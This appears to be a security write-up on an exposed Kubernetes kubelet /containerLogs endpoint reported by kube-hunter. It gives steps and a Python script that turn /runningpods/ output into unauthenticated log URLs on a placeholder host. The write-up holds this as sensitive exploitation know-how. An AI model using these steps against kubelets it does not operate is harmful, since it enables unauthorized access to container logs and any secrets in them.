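This article analyzes the security vulnerability in the containerLogs endpoint of the Kubernetes Kubelet API and shows how container log information can be obtained through unauthorized access, including the specific exploitation steps and how the URLs are constructed.
Kubernetes: Kubelet API containerLogs endpoint
How to get information from the open /containerLogs endpoint reported by kube-hunter
Vulnerability information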
+---------------+-------------+-------------------+----------------------+----------+
| LOCATION      | CATEGORY    | VULNERABILITY     | DESCRIPTION          | EVIDENCE |
+---------------+-------------+-------------------+----------------------+----------+
| 1.2.3.4:10250 | Information | Exposed Container | Output logs from a   |          |
|               | Disclosure  | Logs              | running container    |          |
|               |             |                   | are using the        |          |
|               |             |                   | exposed              |          |
|               |             |                   | /containerLogs       |          |
|               |             |                   | endpoint             |          |
+---------------+-------------+-------------------+----------------------+----------+
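Exploitation steps
Step 1: Retrieve the output of the /runningpods/ endpoint, as in the example below.
You need the namespace, the pod name and the container name.
Given the following runningpods output: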
{"metadata":{"name":"monitoring-influxdb-grafana-v4-6679c46745-zhvjw","namespace":"kube-system","uid":"0d22cdad-06e5-11e9-a7f3-6ac885fbc092","creationTimestamp":null},"spec":{"containers":[{"name":"grafana","image":"sha256:8cb3de219af7bdf0b3ae66439aecccf94cebabb230171fa4b24d66d4a786f4f7","resources":{}},{"name":"influxdb","image":"sha256:577260d221dbb1be2d83447402d0d7c5e15501a89b0e2cc1961f0b24ed56c77c","resources":{}}]}
This translates into the following URLs:
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/grafana
and
https://1.2.3.4:10250/containerLogs/kube-system/monitoring-influxdb-grafana-v4-6679c46745-zhvjw/influxdb
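To scope what this kube-hunter finding exposes on a kubelet you operate, the mapping above can be applied to every pod and container in the /runningpods/ output. This is an added example, not code from the original post; the function name, the PodList wrapper with an `items` array, and the sample JSON are assumptions constructed for illustration.

```python
import json
from urllib.parse import quote

# Constructed sample: the pod from the text, wrapped in the PodList envelope
# (an assumption) that /runningpods/ is taken to return; image fields omitted.
SAMPLE = json.dumps({
    "kind": "PodList",
    "items": [
        {"metadata": {"name": "monitoring-influxdb-grafana-v4-6679c46745-zhvjw",
                      "namespace": "kube-system"},
         "spec": {"containers": [{"name": "grafana"}, {"name": "influxdb"}]}},
        {"metadata": {"name": "no-containers", "namespace": "default"}, "spec": {}},
    ],
})


def exposed_log_urls(runningpods_json, kubelet="1.2.3.4:10250"):
    """Return one /containerLogs URL per (namespace, pod, container)."""
    doc = json.loads(runningpods_json)
    # Accept either a PodList or a single pod object like the excerpt above.
    pods = doc.get("items") if "items" in doc else [doc]
    urls = []
    for pod in pods or []:
        meta = pod.get("metadata") or {}
        ns, name = meta.get("namespace"), meta.get("name")
        if not ns or not name:
            continue  # incomplete entry: no path can be built
        for c in (pod.get("spec") or {}).get("containers") or []:
            if c.get("name"):
                # Percent-encode each segment so odd names cannot alter the path.
                urls.append("https://{}/containerLogs/{}/{}/{}".format(
                    kubelet, quote(ns, safe=""), quote(name, safe=""),
                    quote(c["name"], safe="")))
    return urls


if __name__ == "__main__":
    for url in exposed_log_urls(SAMPLE):
        print(url)
```

Each URL in the result is a log stream that is readable without credentials for as long as the kubelet on port 10250 answers unauthenticated requests, so the list doubles as the inventory of logs to review for secrets.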